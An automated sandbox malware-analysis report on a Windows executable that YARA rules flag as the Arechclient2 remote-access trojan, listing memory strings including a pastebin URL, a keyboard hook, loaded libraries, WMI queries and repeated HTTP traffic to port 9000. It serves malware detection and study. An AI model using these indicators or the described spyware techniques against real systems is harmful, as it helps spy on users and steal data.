                  Source: Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A06000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002ADB000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002B38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A06000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002ADB000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002B38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A06000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002ADB000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002B38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabS
                  Source: Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A06000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002ADB000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002B38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: Kyuo21uNlG.exe, 00000000.00000002.4125805350.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/cLika3dt
                  Source: Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A06000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002ADB000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002B38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A06000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002ADB000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, Kyuo21uNlG.exe, 00000000.00000002.4125805350.0000000002B38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06A22260 SetWindowsHookExW 0000000D,00000000,?,?0_2_06A22260

                  System Summary

                  barindex
                  Source: Kyuo21uNlG.exe, type: SAMPLEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                  Source: 0.0.Kyuo21uNlG.exe.420000.0.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_00B0C8800_2_00B0C880
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_00B0B01F0_2_00B0B01F
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_00B010700_2_00B01070
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_00B0D1100_2_00B0D110
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_00B015E00_2_00B015E0
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_00B0BD780_2_00B0BD78
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_00B0C8330_2_00B0C833
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_00B0C8430_2_00B0C843
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_00B0A9080_2_00B0A908
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_00B0B09E0_2_00B0B09E
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_00B0D0F30_2_00B0D0F3
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_00B010600_2_00B01060
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_00B015C30_2_00B015C3
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_00B0BD450_2_00B0BD45
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_0544E95F0_2_0544E95F
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_0544F9E80_2_0544F9E8
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_054411B80_2_054411B8
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_05444CC00_2_05444CC0
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06875EC00_2_06875EC0
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06876E400_2_06876E40
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_068782700_2_06878270
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_068777800_2_06877780
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06870FA00_2_06870FA0
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_068763E80_2_068763E8
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_068748380_2_06874838
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_0687E4400_2_0687E440
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_0687A8700_2_0687A870
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_068755900_2_06875590
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_068795F00_2_068795F0
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_0687E95E0_2_0687E95E
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06875EAF0_2_06875EAF
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06870F900_2_06870F90
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_068763CE0_2_068763CE
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_068713150_2_06871315
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_068700070_2_06870007
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_068748290_2_06874829
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_068700400_2_06870040
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_0687A8600_2_0687A860
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06879D800_2_06879D80
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06879D890_2_06879D89
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_068795E00_2_068795E0
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_0687351C0_2_0687351C
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_068735380_2_06873538
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_0687557F0_2_0687557F
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06879D7E0_2_06879D7E
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_069E9E900_2_069E9E90
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_069EE8E70_2_069EE8E7
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_069E1C080_2_069E1C08
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_069E70500_2_069E7050
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_069E00400_2_069E0040
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_069E11F70_2_069E11F7
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_069E9E800_2_069E9E80
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_069E5A080_2_069E5A08
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_069E0FD00_2_069E0FD0
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_069E2B600_2_069E2B60
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_069EC8DB0_2_069EC8DB
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_069EE0D00_2_069EE0D0
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_069EBCE50_2_069EBCE5
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_069E28380_2_069E2838
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_069EBD000_2_069EBD00
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06A27E800_2_06A27E80
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06A267980_2_06A26798
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06A254680_2_06A25468
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06A2BA700_2_06A2BA70
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06A273F80_2_06A273F8
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06A230B00_2_06A230B0
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06A208280_2_06A20828
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06A200400_2_06A20040
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06A2E9EA0_2_06A2E9EA
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06A239E80_2_06A239E8
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06A2CC280_2_06A2CC28
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06A2CC380_2_06A2CC38
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06A2DA990_2_06A2DA99
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06A273E80_2_06A273E8
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06A28B5A0_2_06A28B5A
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06A228800_2_06A22880
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06A2309F0_2_06A2309F
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06A250E80_2_06A250E8
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06A250D70_2_06A250D7
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06A200070_2_06A20007
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06A2081A0_2_06A2081A
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_06A239D80_2_06A239D8
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_071A73600_2_071A7360
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_071AE4700_2_071AE470
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_071AE4800_2_071AE480
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_071A58B00_2_071A58B0
                  Source: Kyuo21uNlG.exe, 00000000.00000002.4131587435.0000000006DE9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Kyuo21uNlG.exe
                  Source: Kyuo21uNlG.exe, 00000000.00000002.4124968111.0000000000B6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Kyuo21uNlG.exe
                  Source: Kyuo21uNlG.exe, 00000000.00000000.1673629570.0000000000422000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebluefin.exe" vs Kyuo21uNlG.exe
                  Source: Kyuo21uNlG.exe, 00000000.00000002.4125805350.00000000027F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Kyuo21uNlG.exe
                  Source: Kyuo21uNlG.exeBinary or memory string: OriginalFilenamebluefin.exe" vs Kyuo21uNlG.exe
                  Source: Kyuo21uNlG.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: Kyuo21uNlG.exe, type: SAMPLEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 0.0.Kyuo21uNlG.exe.420000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/13@0/1
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeMutant created: \Sessions\1\BaseNamedObjects\a381c7bea27345e09604787bfabaa590
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeFile created: C:\Users\user\AppData\Local\Temp\tmp6B02.tmpJump to behavior
                  Source: Kyuo21uNlG.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Kyuo21uNlG.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Kyuo21uNlG.exeReversingLabs: Detection: 68%
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                  Source: Kyuo21uNlG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_00B0EC5D push eax; iretd 0_2_00B0EC5E
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_069E7A34 push esp; retf 0_2_069E7A35
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_069E8552 push esp; ret 0_2_069E8559
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_071AC5DD push dword ptr [ecx+ecx-75h]; iretd 0_2_071AC5E3
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_071A0880 push es; ret 0_2_071A0890
                  Source: Kyuo21uNlG.exeStatic PE information: section name: .text entropy: 6.816467095523557

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49735
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49763
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49765
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49766
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49768
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49783
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49787
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49793
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49798
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49800
